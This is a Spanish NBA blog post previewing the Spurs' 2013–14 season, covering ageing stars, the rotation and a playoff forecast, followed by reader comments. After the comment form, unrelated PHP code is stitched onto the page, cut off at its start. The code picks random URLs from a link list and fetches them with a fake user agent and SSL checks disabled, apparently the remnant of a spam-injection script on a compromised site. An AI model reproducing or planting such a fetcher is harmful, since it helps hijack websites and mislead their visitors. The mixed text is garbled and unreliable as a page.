San Antonio Spurs: Gran Reserva

04 de October de 2013 por TheDeerHunter

Distinto año, misma historia. Llevamos enterrando a los Spurs en los análisis desde que este blog es blog. Es como aquel número de la lotería al que juegas todos los años. No vas a cambiar de número por aquello de “¿y si toca precisamente el año que dejo de jugarlo?”. Sería para arrancarse el pelo a estirones así que no vamos a romper la tradición.

El tiempo no perdona, ni siquiera a estos semidioses acostumbrados a desafiar todos los límites. Ya pudimos comprobarlo en los últimos playoffs con un fuera de serie como Manudo, a sus 36 inviernos. ¡Cómo habría cambiado la historia llegando a la final en plenitud de facultades! 38 años cumplirá el mito de la franquicia, Tim Duncan. No hay palabras para describir su rendimiento el curso pasado pero su declive, más pronto que tarde, será inevitable. Salvo muy contadas y mitológicas excepciones en esta liga esa edad se acerca más a la retirada que a liderar a un equipo en la lucha por el anillo. El problema de veteranía de los Spurs se acentúa con otros nombres clave: Parker 31, Diaw 31, Bonner 33… Y los dos últimos aparentan algunos más.

La franquicia, en buena lógica, parece comprender este hecho. Agotar la era Duncan con dignidad pero nada de tirar la casa por la ventana persiguiendo el anillo que llegaron a acariciar. Seguramente atraerán a algún veterano útil conforme avance el curso y vean las opciones pero a priori la plantilla no es superior a la del subcampeonato. Con la cabeza fría sólo podemos maravillarnos de cómo la exprimió el maestro Popovich, porque es la que es y por nombres es difícilmente explicable que dominara otra vez la regular, se paseara por el Oeste y pusiera contra las cuerdas a Miami. Y además jugando como los ángeles… 

La línea de bases está encabezada por el flamante MVP del reciente Eurobasket. Tony Parker es indiscutiblemente uno de los mejores bases de la liga y la primera espada del equipo. Para proteger sus piernas es bastante posible que este año suba la presencia de los otros 3 guards del equipo. Nando de Colo, Cory Joseph y Patty Mills se repartirán en la regular algunos minutos más de los 10 por cabeza en los que se vaciaban el curso pasado. El equipo está bien cubierto por ahí.

En la posición de escolta Popovich también tiene para elegir. El titular previsiblemente volverá a ser el francotirador Danny Green que también será utilizado como alero cuando Leonard descanse. Manu Ginobili es el 6º hombre de la franquicia por antonomasia, aunque quizá traten de reservarlo algo más perdiendo minutos en la regular a favor de Marco Belinelli, que llega para sustituir a Gary Neal.

Como único alero nato del equipo tenemos a Kawhi Leonard. Su progresión es asombrosa y este año debería de tener más peso ofensivo. Gran parte de las opciones que tienen Los Spurs de repetir gestas pasan necesariamente por sus manos. Puede consolidarse como uno de los 3s de referencia en la conferencia y es el hombre que liderará la reconstrucción cuando esta se produzca.

Por dentro, el gran Tim Duncan. El mejor power forward de la historia y uno de los 10 mejores jugadores de todos los tiempos. Hubiera sido demasiado bonito conseguir un MVP de las finales a lo Jabbar, con 37 años. Veremos cómo resiste la larga temporada que se avecina.  Si quiere llegar entero a la postemporada debería reducir necesariamente su presencia en la cancha. No será fácil delegar demasiados minutos en el especialista Matt Bonner o en el jugador de 4º año Jeff Ayres (anteriormente conocido como Jeff Pendergraph), prácticamente inédito en sus pasadas campañas con Blazers y Pacers.

El pívot titular será Tiago Splitter que debería dar un paso adelante consolidando las gratas impresiones que dio en la pasada regular pero no en unos playoffs desastrosos que costaron el anillo. Boris Diaw repartirá sus minutos como 4 y 5 ofreciendo siempre ese gran trabajo oscuro que siempre aporta, aunque esté lejos sus mejores años. Por último, Aaron Baynes completa la rotación. Destaca aquí la salida por la puerta de atrás de DeJuan Blair. Su caso resulta un poco incomprensible.

Por lo tanto, teniendo en cuenta cómo se ha puesto el Oeste, con un par de equipos sobre el papel superiores y un puñado más como mínimo equiparables, será altamente complicado que nos brinden otra gran temporada como la pasada. Seguro que pelearán playoffs y una vez allí serán un hueso duro como siempre, pero no va a ser ni remotamente un camino de rosas. Disfrutemos simplemente de las últimas batallas de este equipo mitológico.

Altas: Jeff Ayres (IND), Marco Belinelli (CHI)
Bajas: DeJuan Blair (DAL), Tracy McGrady, Gary Neal (MIL)

Quinteto: Tony Parker, Danny Green, Kawhi Leonard, Tim Duncan y Tiago Splitter.
Sexto hombre: Manu Ginobili

Pronóstico:  6º-8º del Oeste (45-50 victorias). Primera ronda.

 

Comenta

9 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Cualquiera dice nada en contra de los Spurs,año tras año se empeñan en echar por tierra los pronósticos de fin de ciclo.Mismo equipo,mismos valores,mismas características con un año más de basket en las piernas,les doy metidos en PO con la gorra -entre los 4 primeros- pero este año la postemporada es mucho más difícil.Salvo que clasifiquen 1º o 2º no les vaticino un cruce fácil con todo lo que ello conlleva.

    ¡A disfrutar de la enésima clase de Tim Duncan!

      Citar

  2. Laker1624 dice:
    #2

    Pues en el oeste, y junto a los Thunder, yo los veo los favoritos para llegar a la final.

      Citar

  3. rumbero dice:
    #3

    Yo es que soy incapaz de no ponerlos entre los 4 primeros. Algún día pincharán pero en los últimos años han funcionado como un reloj durante RS. Pop sabe un rato de eso. Y si bien el año de más siempre pesa en los más veteranos, yo confío que sea un plus para que Green, Leonard y Splitter tiren del carro y más con el cursillo acelerado en los PO de la temporada pasada.

    Una vez allí pues lo de siempre. Unos viejales, segunda ronda como mucho, blablabla pero estos tíos tuvieron el anillo puesto en el dedo el año pasado (es recordarlo y se me gira el estómago). Así que yo hasta que no se vayan Duncan y Popovich no los entierro.

      Citar

  4. HisRoyalAirness dice:
    #4

    MITOS

    (sólo venía a poner esto)

      Citar

  5. r_miller dice:
    #5

    Pues yo creo que quedaran de los 4 primeros i llegaran al menos a semifinal de conferencia y si Duncan juega 3/4 partes de bien de los que jugo en todo el año pasado mas el crecimiento del rendimiento de Kawai yo creo que pueden mantener el nivel ademas parker con 31 correra igual que si tuviera 25 eso lo sabemos y lo que conocemos seguro es que los 3 pilares son grandisimos profesionales que se preparan al maximo para la temporada.

      Citar

  6. Esteban dice:
    #6

    aburrido y competitivo, cansa la repeticion de el analisi de los spurs (no culpa del analista)

    a los que nos gusta la emocion de la nba, nos tiene medio podrido que todos los años los spurs sean los mismos e igual de buenos

    asi y todo shapo por ellos

      Citar

  7. Sancho88 dice:
    #7

    Pues este año seguro que el trío la-la-la no pasa de 2 partidos por semana juntos. Ginobili por su estado de salud solo juega porque está donde está y por una responsabilidad casi ética con un equipo de leyenda al que debe toda su carrera, y Duncan lo tienen que reservar para Playoffs. Si fuera posible yo no le pondría más de 50 partidos, o unos pocos más pero jugando pocos minutos. Me ha gustado mucho el eurobasket de Diaw, Splitter tiene que dar un paso adelante pero con la salida de Blair parece que tienen un poco coja la posición de 5. El resto del equipo está muy bien, con muchas posibles combinaciones. Veremos a Leonard de 4 esta temporada? es posible.

    Lo dicho, mientras las lesiones les respeten, Spurs estarán entre los 4 mejores de la liga. Mientras Duncan siga saltando a la cancha, eso es garantía de éxito. El día que Duncan deje este negocio, entonces hablaremos de otra cosa, pero mientras tanto, la pureza al 98% de Duncan no lo da ninguna otra mierda de cristal azul de todo el planeta. Tim Duncan es el jodido Heisenberg de la NBA

      Citar

  8. Sancho88 dice:
    #8

    PD: Por cierto, el título les va que ni pintado, jejee. Chateaux de Briand del 76… jeje, calidad máxima. Son el gran reserva de esta liga. Un equipo top 5 de los mejores de toda la historia del baloncesto. Irrepetibles

      Citar

  9. Nacho dice:
    #9

    Se podría citar a Sancho:

    Sancho88:
    Un equipo top 5 de los mejores de toda la historia del baloncesto. Irrepetibles

    A HisRoyal:

    HisRoyalAirness:
    MITOS

    A Rumbero:

    rumbero:

    Unos viejales, segunda ronda como mucho, blablabla pero estos tíos tuvieron el anillo puesto en el dedo el año pasado (es recordarlo y se me gira el estómago). Así que yo hasta que no se vayan Duncan y Popovich no los entierro.

    A Deer:
    “Seguro que pelearán playoffs y una vez allí serán un hueso duro como siempre, pero no va a ser ni remotamente un camino de rosas. Disfrutemos simplemente de las últimas batallas de este equipo mitológico.”

    A Esteban:

    Esteban:

    a los que nos gusta la emocion de la nba, nos tiene medio podrido que todos los años los spurs sean los mismos e igual de buenos

    Y podría seguir, porque todos alguna vez hemos dicho ya todo.
    Pero es que lo de estos tíos es simplemente un homenaje al baloncesto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>